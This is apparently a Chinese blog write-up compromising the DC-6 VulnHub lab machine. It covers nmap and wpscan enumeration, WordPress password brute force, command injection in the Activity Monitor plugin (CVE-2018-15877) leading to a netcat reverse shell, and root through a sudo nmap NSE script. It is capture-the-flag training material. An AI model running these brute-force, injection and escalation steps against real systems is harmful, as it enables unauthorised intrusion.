目录

DC-6靶机渗透测试

1、信息收集

1.1 发现DC-6的IP地址

1.2 扫描开放端口

1.3 访问web网页(添加本地DNS解析)

1.4 Wpscan扫描站点(用户名)

2、WEB渗透

2.1 爆破WordPress站点用户名和密码

2.2 爆破后台路径

2.3、activity monitor漏洞利用

2.4  进入mark的家目录

2.5、反弹jens用户的shell

3、通过nmap提权


DC-6靶机渗透测试

0x00实验环境

靶机:DC-6,MAC地址:00:0C:29:85:9D:FD(192.168.3.190)

测试机:Kali,IP地址:192.168.3.188

1、信息收集

1.1 发现DC-6的IP地址

利用DC-6的MAC地址找到IP
命令:nmap -sP 192.168.3.1/24 -oN nmap.sP
发现DC-6的IP为192.168.3.190

1.2 扫描开放端口

nmap -A 192.168.3.190 -p 1-65535 -oN nmap.A

发现开放了22端口和80端口

以及:http-title: Did not follow redirect to http://wordy/    访问ip后会重定向到http://wordy/

1.3 访问web网页(添加本地DNS解析)

本机访问192.168.3.190,发现网页打不开,是因为没有添加本地DNS解析

我们在本机C:\Windows\System32\drivers\etc的hosts文件中添加

本地添加DNS解析之后,刷新后发现能成功访问(我们原来输入的是IP地址,它会自动跳转到wordy)

发现:
Wordy
Just another WordPress site

是一个WordPress(是国外三大开源的PHP CMS 之一)

除了本地需要修改hosts文件,那我们用kali虚拟机去访问目标80端口的时候,我们也需要去修改一下本机的host文件
vim /etc/hosts

1.4 Wpscan扫描站点(用户名)

wpscan --url wordy -e u           列出WordPress用户和账号

u 枚举用户名,默认从1-10
--enumerate -e [option(s)]  枚举
--url -u  要扫描的`WordPress`站点.

在使用wpscan之前我们要做一个工具的更新:   wpscan --update    更新工具

2、WEB渗透

2.1 爆破WordPress站点用户名和密码

扫描后发现存在admin、sarah、graham、mark、jens用户,尝试爆破出密码

DC-6的作者在这里也给出了密码的提示https://www.vulnhub.com/entry/dc-6,315/

OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job.

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. ;-)

先把admin、sarah、graham、mark、jens用户写在user.dic

wpscan --url wordy -U user.dic -P passwords.txt(使用wpscan爆破WordPress站点用户名和密码)

Username: mark,
Password: helpdesk01

2.2 爆破后台路径

Robots.txt 有时会写着,在一个一般开源cms都是有固定后台的,比如joomla后台路径就是administrator ,wordpress的就是wp_admin ,dedecms就是dede 常用的还有admin login manger 等等

登录后台:

发现使用了activity monitor插件

2.3、activity monitor漏洞利用

百度搜索其漏洞:http://blog.nsfocus.net/cve-2018-15877/

或者kali搜索其插件漏洞:
searchsploit active monitor

存在远程执行漏洞可以反弹shell 到本地

cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html

打开45274.html,修改如下两处地方

python -m SimpleHTTPServer

当前目录下开启http 服务

本机Submit request

本地再监听9999,发现没有反弹成功诶!

burp抓包看看:发现后面加管道符可以执行代码

可以看到漏洞说的确存在的,那么我们下一步就弹shell

我们现在本地监听一下:nc -lvvp 2333

抓包改包、放包

连接成功:

进入交互式shell

2.4  进入mark的家目录

- Add new user: graham - GSo7isUM1D4 - done

得到用户graham的密码,用ssh远程登录

检查sudo权限

可以看到 “backups.sh” 不需要密码,即可修改

利用这个sh脚本可以直接获取到jens的shell

2.5、反弹jens用户的shell

sudo -l看一下

3、通过nmap提权

nmap提权可以参考:https://gtfobins.github.io/gtfobins/nmap/#shell

echo "os.execute('/bin/bash')" >> root.nse    #将os.execute('/bin/bash')写入到root.nse文件中

sudo nmap --script=root.nse                         #利用nmap插件执行/bin/bash来获取root权限

1、用wpscan扫描用户名和爆破密码

2、activity monitor命令执行漏洞的利用

3、通过nmap插件来反弹shell

【CyberSecurityLearning 75】DC系列之DC-6渗透测试(WordPress)相关推荐

  1. 【小白渗透入门系列】P5 自动化渗透测试工具

    大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 未经允许,禁止转载 ,违者必究!!!! 本实验仅适用于学习和测试 ,严禁违法操作 ! ! ! 今天更新的是: P5 自动化渗 ...

  2. 网络安全系列-VIII: 什么是渗透测试 Penetration Test?

    什么是渗透测试? 概念及流程 渗透测试: Penetration Test, 是指用黑客的方式攻击你自己或客户的IT系统,来找到其中的安全漏洞.是安全评估的一种手段,目的是为了提高系统的安全性 渗透测 ...

  3. 【DC系列】DC-4靶机渗透练习

    1.主机发现:sudo arp-scan -l,发现靶机ip为192.168.225.143 2.扫描端口,开启了80端口 nmap 192.168.225.143 -sV -sC -Pn -n -v ...

  4. kali渗透测试系列---信息收集

    kali 渗透测试系列 文章目录 kali 渗透测试系列 信息收集 信息收集 信息收集阶段可以说是在整个渗透测试或者攻击很重要的阶段,毕竟知己知彼才能百战百胜,否则从目标主机使用的平台到数据库的使用再 ...

  5. 【CyberSecurityLearning 74】DC系列之DC-5渗透测试

    目录 DC系列之DC-5渗透测试 实验环境: 实验步骤: 1.主机扫描,确定目标主机IP 2.对DC-5进行端口扫描 3.访问DC-5的web服务,了解相关信息 4.使用wfuzz测试页面参数 5.看 ...

  6. 【CyberSecurityLearning 78】DC系列之DC-9渗透测试

    目录 DC-9靶机渗透测试 1.信息收集 1.1 扫描开放的端口 1.2 访问WEB站点 2. SQL注入 3.admin登录后台 4.尝试文件包含 4.1 利用 LFI 查看 /etc/knockd ...

  7. 【CyberSecurityLearning 77】DC系列之DC-8渗透测试(Drupal)

    目录 DC-7靶机渗透测试 1.信息收集 1.1 扫描DC-8开放端口 1.2 访问WEB站点 2.渗透过程 2.1 用Sqlmap自动化工具注入 2.2 drush 命令对任意用户密码进行更改(发现 ...

  8. 【CyberSecurityLearning 76】DC系列之DC-7渗透测试(Drupal)

    目录 DC-7靶机渗透测试 1.信息收集 1.1 扫描开放的端口 1.2 访问WEB站点 2.登录ssh 3. 提权(suid提权) 3.1 exim4提权 4.drush 命令对任意用户密码进行更改 ...

  9. 【CyberSecurityLearning 73】DC系列之DC-4渗透测试

    目录 DC-4靶机渗透测试 信息收集 web渗透 DC-4靶机渗透测试 DC-4对于我们来说同样是黑盒测试 DC-4靶机MAC地址:00:0C:29:86:67:2E kali2021:192.168 ...

最新文章

  1. HTML添加上传图片并进行预览
  2. [Android]开发摇一摇分歧表决器过程
  3. 医药信息化:GMP/GSP之后
  4. 怎么删除Elasticsearch里的index内容
  5. Java实现找出数组中重复次数最多的元素以及个数
  6. redis下并发问题解决方案
  7. ajax实现翻书效果,jQuery实现手机版页面翻页效果的简单实例
  8. 5分钟了解什么是真正的深度学习
  9. IIR数字滤波器的设计及应用——MATLAB
  10. 解决手动运行脚本执行正常而放入crontab后不正常的方法
  11. 吴恩达机器学习作业Python实现(三):多类分类和前馈神经网络
  12. Spring boot集成Swagger3
  13. vue 初始化请求例子_Vue实例初始化
  14. 图吧工具箱2021最纯净的电脑硬件工具箱
  15. 2021最新计算机二级C语言试题
  16. linux windows凤凰,凤凰系统率先升级内核到Linux4.9,支持更多新硬件
  17. 16999元!华为Mate X终于发布了!附上手视频
  18. 微信小程序第三方平台开发流程以及改善
  19. 有理数加法+有理数均值+排列枚举
  20. amber分子动力学模拟干货总结

热门文章

  1. 遍历groupBox控件的每一个子控件的写法
  2. hdu 1086(判断两线段是否相交)
  3. hdu 4983(欧拉函数)
  4. hdu-1438 钥匙计数之一
  5. poj-Scout YYF I
  6. ZOJ 3702 Gibonacci number(数学推导题)
  7. NYOJ 711 最舒适的路线(并查集)
  8. python爬虫---实现项目(二) 分析Ajax请求抓取数据
  9. 如何使用ROS查找rgbdslam代码包框架的输入
  10. 如何使用 Jenkins、GitHub 和 Docker 在 Azure 中的 Linux VM 上创建开发基础结构